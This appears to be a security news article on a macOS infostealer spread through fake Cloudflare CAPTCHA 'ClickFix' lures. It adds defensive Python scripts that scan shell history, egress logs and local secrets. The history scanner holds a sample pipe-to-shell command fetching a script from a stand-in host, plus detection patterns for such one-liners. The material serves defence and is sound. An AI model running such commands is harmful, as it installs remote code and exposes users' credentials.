New Infinity Stealer: macOS Users Targeted by Sophisticated ClickFix "Cloudflare" CAPTCHA Lures
A sophisticated new malware campaign, dubbed Infinity Stealer, is actively targeting macOS users through a deceptive "ClickFix" social engineering tactic. By impersonating legitimate services like Cloudflare, attackers trick users into executing malicious code that harvests high-value data, including browser credentials, cryptocurrency wallets, and developer secrets.
The "ClickFix" Infection Vector
The attack begins when a user visits a compromised or malicious website. Instead of the expected content, they are presented with a fake Cloudflare CAPTCHA or a browser error message. The page instructs the user to "fix" the issue by clicking a button that copies a command to their clipboard and instructs them to paste and run it in the macOS Terminal.
This bypasses traditional browser security prompts by leveraging the user's own administrative trust. Once the command is executed, it downloads and launches the Infinity Stealer payload.
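Because the payload only runs after the victim pastes the copied command into Terminal, the command itself is an artifact that lands in the user's shell history and can be reviewed after the fact. The script below is an added example written for this article, not code from the campaign or from any vendor: it strips zsh extended-history prefixes and scores each command against a small set of generic "paste-this-to-fix-it" indicators (a downloader piped into a shell, base64 decoding, osascript, quarantine-attribute removal, backgrounding). The indicator list and the sample history are assumptions constructed for the example, not patterns or commands taken from the Infinity Stealer sample.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Generic indicators of a copy-paste "fix this" one-liner. These are assumptions
# chosen for this example, not patterns taken from the Infinity Stealer sample.
INDICATORS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "osascript": re.compile(r"\bosascript\s+-e\b"),
    "quarantine_strip": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
    "background_exec": re.compile(r"\bnohup\b|&\s*disown\b"),
}


@dataclass
class Finding:
    command: str
    indicators: List[str]

    @property
    def score(self) -> int:
        # One point per matched indicator; review anything with a score >= 1.
        return len(self.indicators)


# zsh EXTENDED_HISTORY stores lines as ': <epoch>:<elapsed>;<command>'
ZSH_EXTENDED_PREFIX = re.compile(r"^: \d+:\d+;")


def parse_zsh_history(raw: str) -> List[str]:
    """Strip zsh extended-history prefixes and drop blank lines."""
    return [ZSH_EXTENDED_PREFIX.sub("", ln).strip() for ln in raw.splitlines() if ln.strip()]


def analyze_command(cmd: str) -> Optional[Finding]:
    """Return a Finding listing every indicator the command matches, or None."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return Finding(cmd, hits) if hits else None


def scan_commands(commands: List[str]) -> List[Finding]:
    """Analyze each command and keep only those that matched something."""
    return [f for f in (analyze_command(c) for c in commands) if f is not None]


# Constructed sample history (not real data): three benign commands and two that
# match the indicators above. The hostname uses the reserved .example TLD.
SAMPLE_HISTORY = """\
: 1710000000:0;ls -la
: 1710000010:0;git status
: 1710000020:0;curl -fsSL https://captcha-check.example/verify.sh | bash
: 1710000030:0;echo aGVsbG8= | base64 -D
: 1710000040:0;brew update
"""

if __name__ == "__main__":
    for f in scan_commands(parse_zsh_history(SAMPLE_HISTORY)):
        print(f"[score {f.score}] {f.command}  <- {', '.join(f.indicators)}")
```

On a real host you would feed it the contents of `~/.zsh_history` (or `~/.bash_history`) instead of `SAMPLE_HISTORY`; the same `analyze_command` function works on a string read from the clipboard if you want to warn before a paste rather than after.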
Technical Analysis of the Payload
Infinity Stealer is a Python-based malware, but it is notably compiled into a native macOS executable using the Nuitka compiler. This technique makes the code harder to reverse-engineer compared to standard Python scripts and allows it to run seamlessly on macOS environments without requiring a pre-installed Python interpreter.
Key Capabilities:
- Anti-Analysis: The malware performs checks for virtual machines and debugging environments to avoid detection by security researchers.
- Credential Harvesting: It targets Google Chrome, Safari, and Firefox to steal saved passwords, cookies, and autofill data.
- macOS Keychain Extraction: It attempts to access the system Keychain to retrieve sensitive certificates and account credentials.
- Crypto & Developer Theft: The stealer scans for cryptocurrency wallet extensions (MetaMask, Phantom) and searches for `.env` files or `.ssh` folders to grab plaintext developer secrets and API keys.
Command and Control (C2) Infrastructure
The stolen data is bundled into a ZIP archive and exfiltrated to a remote server via HTTP POST requests. Simultaneously, the malware sends a notification to the attacker's Telegram bot, providing a real-time "hit" notification that includes the victim's IP address, system specifications, and a summary of stolen items.
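The exfiltration pattern described above (a bulk archive upload to an unfamiliar host paired with a small notification to the Telegram Bot API from the same machine) is something a web-proxy or egress log can surface. The following is an added example, not code from the article's sources or from any product: it parses a constructed, space-separated log format (an assumption for this example), flags large archive POSTs to hosts outside an allowlist, flags any request to `api.telegram.org` (the real Telegram Bot API hostname), and then correlates both signals per source address. All sample IPs, hosts and paths are constructed.

```python
from typing import Dict, List, NamedTuple, Optional, Set, Tuple


class Request(NamedTuple):
    ts: str
    src: str
    method: str
    host: str
    path: str
    status: int
    bytes_out: int
    content_type: str


def parse_log_line(line: str) -> Optional[Request]:
    """Parse one line of the constructed log format documented below; None if malformed."""
    parts = line.split()
    if len(parts) != 8:
        return None
    ts, src, method, host, path, status, nbytes, ctype = parts
    return Request(ts, src, method, host, path, int(status), int(nbytes), ctype)


# Content types a bundled ZIP upload is likely to carry.
ARCHIVE_TYPES = {"application/zip", "application/x-zip-compressed", "application/octet-stream"}
TELEGRAM_API_HOST = "api.telegram.org"  # real Telegram Bot API hostname

Alert = Tuple[str, str, str]  # (source ip, rule name, destination host)


def detect_exfil(requests: List[Request], allowed_upload_hosts: Set[str],
                 min_bytes: int = 1_000_000) -> List[Alert]:
    """Apply two independent rules to every request and return the alerts raised."""
    alerts: List[Alert] = []
    for r in requests:
        # Rule 1: endpoints normally have no reason to call the Bot API directly.
        if r.host == TELEGRAM_API_HOST:
            alerts.append((r.src, "telegram_bot_api", r.host))
        # Rule 2: a large archive POST to a host not on the upload allowlist.
        if (r.method == "POST" and r.content_type in ARCHIVE_TYPES
                and r.bytes_out >= min_bytes and r.host not in allowed_upload_hosts):
            alerts.append((r.src, "archive_post_unknown_host", r.host))
    return alerts


def correlate(alerts: List[Alert]) -> Set[str]:
    """Sources that both uploaded an archive to an unknown host and talked to the Bot API."""
    rules_by_src: Dict[str, Set[str]] = {}
    for src, rule, _ in alerts:
        rules_by_src.setdefault(src, set()).add(rule)
    needed = {"telegram_bot_api", "archive_post_unknown_host"}
    return {src for src, rules in rules_by_src.items() if needed <= rules}


# Constructed sample log lines (not real traffic). Assumed format:
# <timestamp> <src_ip> <method> <host> <path> <status> <bytes_out> <content_type>
SAMPLE_LOG = """\
2026-03-01T10:00:01Z 10.0.0.12 GET www.apple.com /mac 200 412 text/html
2026-03-01T10:00:09Z 10.0.0.12 POST 203.0.113.45 /upload 200 2489311 application/zip
2026-03-01T10:00:10Z 10.0.0.12 POST api.telegram.org /bot<redacted>/sendMessage 200 318 application/json
2026-03-01T10:02:33Z 10.0.0.40 POST backup.example-corp.internal /api/v1/backup 201 9000000 application/zip
"""
# Constructed allowlist: the one internal host where large archive uploads are expected.
ALLOWED_UPLOAD_HOSTS = {"backup.example-corp.internal"}


def run_sample() -> Tuple[List[Alert], Set[str]]:
    """Run both rules over the sample log and return (alerts, correlated sources)."""
    reqs = [r for r in map(parse_log_line, SAMPLE_LOG.splitlines()) if r is not None]
    alerts = detect_exfil(reqs, ALLOWED_UPLOAD_HOSTS)
    return alerts, correlate(alerts)


if __name__ == "__main__":
    alerts, suspects = run_sample()
    for a in alerts:
        print("alert:", a)
    print("sources matching both rules:", suspects)
```

The `min_bytes` threshold and the allowlist are the two knobs to tune per environment; the correlation step is what turns two noisy single-request rules into a high-confidence signal, since a benign backup job rarely also posts to a Telegram bot.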
Impact and Statistics
While the exact number of victims is not yet known, the "ClickFix" methodology has seen a 40% increase in deployment across various malware families in early 2026 due to its high success rate against non-technical users.
| Feature | Details |
|---|---|
| Malware Type | Infostealer (Spyware) |
| Primary Target | macOS (Intel & Apple Silicon) |
| Programming Language | Python (Compiled via Nuitka) |
| Exfiltration Method | HTTP API & Telegram Bot API |
| Threat Level | Critical (High Data Sensitivity) |
How to Protect Your macOS Device
To defend against Infinity Stealer and similar "ClickFix" campaigns, security professionals recommend the following:
- Never Paste Commands: Legitimate services like Cloudflare or Google will never ask you to copy/paste code into your Terminal or PowerShell to solve a CAPTCHA.
- Use Managed Browser Policies: For organizations, restrict user access to the Terminal or block the execution of unsigned binaries.
- Deploy EDR: Utilize Endpoint Detection and Response (EDR) tools that can identify the execution of suspicious Python-compiled binaries.
- Audit Developer Secrets: Use secret-scanning tools to ensure API keys are not stored in plaintext in local directories.
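The last recommendation can be turned into a quick local audit that covers exactly the two locations the stealer is described as searching: dotenv files and the `.ssh` directory. The script below is an added example for this article, not a tool from any of its sources. It walks a home directory, reports every secret-looking `KEY=VALUE` assignment in `.env*` files, and flags private keys stored without a passphrase (for OpenSSH-format keys it decodes the base64 body and reads the cipher name, which is `none` when the key is unencrypted; for legacy PEM keys it looks for the `ENCRYPTED` header). The secret-name regex and the sample directory tree it builds under a temp dir are constructed assumptions; the fake key contains only the header fields the checker reads and is not a usable key.

```python
import base64
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Key names that usually hold credentials (assumption: a generic list for this example).
SECRET_KEY_RX = re.compile(r"(SECRET|TOKEN|PASSWORD|PASSWD|API_KEY|PRIVATE_KEY|ACCESS_KEY)", re.I)
# dotenv assignment, with optional leading 'export'.
ENV_LINE_RX = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")

Finding = Tuple[str, str]  # (file path, key name or issue)


def scan_env_file(path: Path) -> List[Finding]:
    """Return one finding per secret-looking key that has a non-empty value."""
    findings: List[Finding] = []
    for line in path.read_text(errors="replace").splitlines():
        m = ENV_LINE_RX.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip().strip("'\"")
        if value and SECRET_KEY_RX.search(key):
            findings.append((str(path), key))
    return findings


OPENSSH_MAGIC = b"openssh-key-v1\x00"  # magic prefix of the OpenSSH v1 private key format


def openssh_private_key_is_encrypted(text: str) -> bool:
    """Decode the PEM-like body and read the cipher-name field; 'none' means unencrypted."""
    body = "".join(ln for ln in text.splitlines() if ln and not ln.startswith("-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("not an OpenSSH v1 private key")
    pos = len(OPENSSH_MAGIC)
    n = int.from_bytes(blob[pos:pos + 4], "big")  # length-prefixed string
    cipher = blob[pos + 4:pos + 4 + n]
    return cipher != b"none"


def scan_ssh_dir(ssh_dir: Path) -> List[Finding]:
    """Flag private keys in ~/.ssh that are stored without a passphrase."""
    findings: List[Finding] = []
    for p in sorted(ssh_dir.iterdir()):
        if not p.is_file() or p.suffix == ".pub":
            continue
        text = p.read_text(errors="replace")
        if "BEGIN OPENSSH PRIVATE KEY" in text:
            if not openssh_private_key_is_encrypted(text):
                findings.append((str(p), "unencrypted_openssh_key"))
        elif "PRIVATE KEY-----" in text and "ENCRYPTED" not in text:
            findings.append((str(p), "unencrypted_pem_key"))
    return findings


def audit_home(home: Path) -> List[Finding]:
    """Walk a home directory: every .env* file plus the .ssh directory."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(home):
        for name in filenames:
            if name.startswith(".env"):  # .env, .env.local, .env.production ...
                findings.extend(scan_env_file(Path(dirpath) / name))
    ssh = home / ".ssh"
    if ssh.is_dir():
        findings.extend(scan_ssh_dir(ssh))
    return findings


def build_sample_home() -> Path:
    """Constructed fixture: a fake home dir with a leaky .env and an unencrypted key."""
    home = Path(tempfile.mkdtemp(prefix="audit_demo_"))
    proj = home / "projects" / "app"
    proj.mkdir(parents=True)
    (proj / ".env").write_text("DEBUG=true\nAWS_SECRET_ACCESS_KEY='EXAMPLEnotreal123'\nDB_PASSWORD=\n")
    ssh = home / ".ssh"
    ssh.mkdir()
    # Minimal OpenSSH v1 prefix with cipher 'none' and kdf 'none'; only the fields the
    # checker reads, so this is not a usable key.
    blob = OPENSSH_MAGIC + (4).to_bytes(4, "big") + b"none" + (4).to_bytes(4, "big") + b"none"
    b64 = base64.b64encode(blob).decode()
    (ssh / "id_ed25519").write_text(
        f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n")
    (ssh / "id_ed25519.pub").write_text("ssh-ed25519 AAAA constructed-example\n")
    return home


if __name__ == "__main__":
    for path, issue in audit_home(build_sample_home()):
        print(f"{issue}: {path}")
```

Run it against your real home directory by replacing `build_sample_home()` with `Path.home()`; the point of the output is a list of files to move into a secrets manager or protect with a passphrase (`ssh-keygen -p` re-encrypts an existing key in place).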